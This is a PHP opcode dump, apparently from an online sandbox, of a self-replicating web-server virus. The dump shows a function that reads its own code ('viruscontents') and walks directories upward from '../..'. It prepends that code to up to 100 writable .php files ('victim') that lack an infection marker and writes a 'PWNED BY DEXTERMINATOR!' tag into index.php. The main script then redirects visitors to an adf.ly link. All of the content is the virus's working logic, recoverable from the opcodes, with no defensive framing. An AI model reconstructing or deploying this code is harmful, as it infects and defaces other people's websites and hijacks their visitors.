Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/q7qZT
function name: (null)
number of ops: 17
compiled vars: !0 = $atefile, !1 = $adlink
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > ASSIGN !0, 0
3 1 ROPE_INIT 3 ~8 'http%3A%2F%2F'
2 FETCH_R global ~3 '_SERVER'
3 FETCH_DIM_R ~4 ~3, 'HTTP_HOST'
4 ROPE_ADD 1 ~8 ~8, ~4
5 FETCH_R global ~5 '_SERVER'
6 FETCH_DIM_R ~6 ~5, 'REQUEST_URI'
7 ROPE_END 2 ~7 ~8, ~6
8 ASSIGN !1, ~7
4 9 INIT_FCALL_BY_NAME 'walkthrough'
10 SEND_VAL_EX '..%2F..'
11 DO_FCALL 0
58 12 INIT_FCALL 'header'
13 CONCAT ~12 'Location%3A+http%3A%2F%2Fadf.ly%2F7520520%2F', !1
14 SEND_VAL ~12
15 DO_ICALL
59 16 > RETURN 1
Function walkthrough:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 17, Position 2 = 30
Branch analysis from position: 17
2 jumps found. (Code = 43) Position 1 = 34, Position 2 = 180
Branch analysis from position: 34
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 180
Branch analysis from position: 39
1 jumps found. (Code = 42) Position 1 = 168
Branch analysis from position: 168
2 jumps found. (Code = 46) Position 1 = 174, Position 2 = 176
Branch analysis from position: 174
2 jumps found. (Code = 44) Position 1 = 177, Position 2 = 40
Branch analysis from position: 177
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 40
2 jumps found. (Code = 46) Position 1 = 42, Position 2 = 44
Branch analysis from position: 42
2 jumps found. (Code = 43) Position 1 = 45, Position 2 = 168
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 51, Position 2 = 57
Branch analysis from position: 51
1 jumps found. (Code = 42) Position 1 = 168
Branch analysis from position: 168
Branch analysis from position: 57
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 168
Branch analysis from position: 66
2 jumps found. (Code = 46) Position 1 = 74, Position 2 = 80
Branch analysis from position: 74
2 jumps found. (Code = 43) Position 1 = 81, Position 2 = 111
Branch analysis from position: 81
2 jumps found. (Code = 43) Position 1 = 95, Position 2 = 108
Branch analysis from position: 95
2 jumps found. (Code = 43) Position 1 = 110, Position 2 = 111
Branch analysis from position: 110
2 jumps found. (Code = 43) Position 1 = 113, Position 2 = 168
Branch analysis from position: 113
2 jumps found. (Code = 43) Position 1 = 120, Position 2 = 140
Branch analysis from position: 120
2 jumps found. (Code = 43) Position 1 = 154, Position 2 = 159
Branch analysis from position: 154
1 jumps found. (Code = 42) Position 1 = 164
Branch analysis from position: 164
2 jumps found. (Code = 46) Position 1 = 174, Position 2 = 176
Branch analysis from position: 174
Branch analysis from position: 176
Branch analysis from position: 159
2 jumps found. (Code = 46) Position 1 = 174, Position 2 = 176
Branch analysis from position: 174
Branch analysis from position: 176
Branch analysis from position: 140
Branch analysis from position: 168
Branch analysis from position: 111
Branch analysis from position: 108
Branch analysis from position: 111
Branch analysis from position: 80
Branch analysis from position: 168
Branch analysis from position: 168
Branch analysis from position: 44
Branch analysis from position: 176
Branch analysis from position: 180
Branch analysis from position: 180
Branch analysis from position: 30
filename: /in/q7qZT
function name: walkthrough
number of ops: 182
compiled vars: !0 = $dir, !1 = $atefile, !2 = $maxi, !3 = $viruscontents, !4 = $handle, !5 = $dh, !6 = $file, !7 = $infected, !8 = $caniwrite, !9 = $output, !10 = $contents, !11 = $mine, !12 = $victim, !13 = $ori, !14 = $counter
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
5 0 E > RECV !0
6 1 BIND_GLOBAL !1, 'atefile'
7 2 ASSIGN !2, 100
8 3 INIT_FCALL 'fread'
4 INIT_FCALL 'fopen'
5 SEND_VAL '%2Fin%2Fq7qZT'
6 SEND_VAL 'r'
7 DO_ICALL $16
8 SEND_VAR $16
9 SEND_VAL 1644
10 DO_ICALL $17
11 ASSIGN !3, $17
9 12 INIT_FCALL 'file_exists'
13 SEND_VAL 'index.php'
14 DO_ICALL $19
15 BOOL_NOT ~20 $19
16 > JMPZ ~20, ->30
10 17 > INIT_FCALL 'fopen'
18 SEND_VAL 'index.php'
19 SEND_VAL 'a'
20 DO_ICALL $21
21 ASSIGN !4, $21
11 22 INIT_FCALL 'fwrite'
23 SEND_VAR !4
24 CONCAT ~23 !3, 'PWNED+BY+DEXTERMINATOR%21'
25 SEND_VAL ~23
26 DO_ICALL
12 27 INIT_FCALL 'fclose'
28 SEND_VAR !4
29 DO_ICALL
14 30 > INIT_FCALL 'is_dir'
31 SEND_VAR !0
32 DO_ICALL $26
33 > JMPZ $26, ->180
15 34 > INIT_FCALL 'opendir'
35 SEND_VAR !0
36 DO_ICALL $27
37 ASSIGN ~28 !5, $27
38 > JMPZ ~28, ->180
16 39 > > JMP ->168
17 40 > IS_NOT_EQUAL ~29 !6, '.'
41 > JMPZ_EX ~29 ~29, ->44
42 > IS_NOT_EQUAL ~30 !6, '..'
43 BOOL ~29 ~30
44 > > JMPZ ~29, ->168
18 45 > INIT_FCALL 'is_dir'
46 CONCAT ~31 !0, '%2F'
47 CONCAT ~32 ~31, !6
48 SEND_VAL ~32
49 DO_ICALL $33
50 > JMPZ $33, ->57
19 51 > INIT_FCALL_BY_NAME 'walkthrough'
52 CONCAT ~34 !0, '%2F'
53 CONCAT ~35 ~34, !6
54 SEND_VAL_EX ~35
55 DO_FCALL 0
56 > JMP ->168
21 57 > INIT_FCALL 'strstr'
58 INIT_FCALL 'substr'
59 SEND_VAR !6
60 SEND_VAL -4
61 DO_ICALL $37
62 SEND_VAR $37
63 SEND_VAL 'php'
64 DO_ICALL $38
65 > JMPZ $38, ->168
22 66 > ASSIGN !7, <true>
23 67 ASSIGN !8, <false>
24 68 INIT_FCALL 'is_file'
69 CONCAT ~41 !0, '%2F'
70 CONCAT ~42 ~41, !6
71 SEND_VAL ~42
72 DO_ICALL $43
73 > JMPZ_EX ~44 $43, ->80
74 > INIT_FCALL 'is_writeable'
75 CONCAT ~45 !0, '%2F'
76 CONCAT ~46 ~45, !6
77 SEND_VAL ~46
78 DO_ICALL $47
79 BOOL ~44 $47
80 > > JMPZ ~44, ->111
25 81 > INIT_FCALL 'fopen'
82 CONCAT ~48 !0, '%2F'
83 CONCAT ~49 ~48, !6
84 SEND_VAL ~49
85 SEND_VAL 'r'
86 DO_ICALL $50
87 ASSIGN !9, $50
26 88 INIT_FCALL 'filesize'
89 CONCAT ~52 !0, '%2F'
90 CONCAT ~53 ~52, !6
91 SEND_VAL ~53
92 DO_ICALL $54
93 IS_SMALLER 0, $54
94 > JMPZ ~55, ->108
27 95 > INIT_FCALL 'fread'
96 SEND_VAR !9
97 SEND_VAL 20
98 DO_ICALL $56
99 ASSIGN !10, $56
28 100 INIT_FCALL 'strstr'
101 SEND_VAR !10
102 SEND_VAL 'index.php'
103 DO_ICALL $58
104 ASSIGN !11, $58
29 105 INIT_FCALL 'fclose'
106 SEND_VAR !9
107 DO_ICALL
31 108 > ASSIGN !7, <false>
32 109 > JMPZ !11, ->111
110 > ASSIGN !7, <true>
34 111 > BOOL_NOT ~63 !7
112 > JMPZ ~63, ->168
35 113 > INIT_FCALL 'filesize'
114 CONCAT ~64 !0, '%2F'
115 CONCAT ~65 ~64, !6
116 SEND_VAL ~65
117 DO_ICALL $66
118 IS_SMALLER 0, $66
119 > JMPZ ~67, ->140
36 120 > INIT_FCALL 'fopen'
121 CONCAT ~68 !0, '%2F'
122 CONCAT ~69 ~68, !6
123 SEND_VAL ~69
124 SEND_VAL 'r%2B'
125 DO_ICALL $70
126 ASSIGN !12, $70
37 127 INIT_FCALL 'fread'
128 SEND_VAR !12
129 INIT_FCALL 'filesize'
130 CONCAT ~72 !0, '%2F'
131 CONCAT ~73 ~72, !6
132 SEND_VAL ~73
133 DO_ICALL $74
134 SEND_VAR $74
135 DO_ICALL $75
136 ASSIGN !13, $75
38 137 INIT_FCALL 'fclose'
138 SEND_VAR !12
139 DO_ICALL
40 140 > INIT_FCALL 'fopen'
141 CONCAT ~78 !0, '%2F'
142 CONCAT ~79 ~78, !6
143 SEND_VAL ~79
144 SEND_VAL 'w%2B'
145 DO_ICALL $80
146 ASSIGN !12, $80
41 147 INIT_FCALL 'filesize'
148 CONCAT ~82 !0, '%2F'
149 CONCAT ~83 ~82, !6
150 SEND_VAL ~83
151 DO_ICALL $84
152 IS_EQUAL $84, 0
153 > JMPZ ~85, ->159
42 154 > INIT_FCALL 'fwrite'
155 SEND_VAR !12
156 SEND_VAR !3
157 DO_ICALL
158 > JMP ->164
44 159 > INIT_FCALL 'fputs'
160 SEND_VAR !12
161 CONCAT ~87 !3, !13
162 SEND_VAL ~87
163 DO_ICALL
46 164 > PRE_INC !1
47 165 INIT_FCALL 'fclose'
166 SEND_VAR !12
167 DO_ICALL
16 168 > INIT_FCALL 'readdir'
169 SEND_VAR !5
170 DO_ICALL $91
171 ASSIGN ~92 !6, $91
172 TYPE_CHECK 1018 ~93 ~92
173 > JMPZ_EX ~93 ~93, ->176
174 > IS_SMALLER ~94 !1, !2
175 BOOL ~93 ~94
176 > > JMPNZ ~93, ->40
53 177 > INIT_FCALL 'closedir'
178 SEND_VAR !5
179 DO_ICALL
56 180 > > RETURN !14
57 181* > RETURN null
End of function walkthrough
Generated using Vulcan Logic Dumper, using php 8.0.0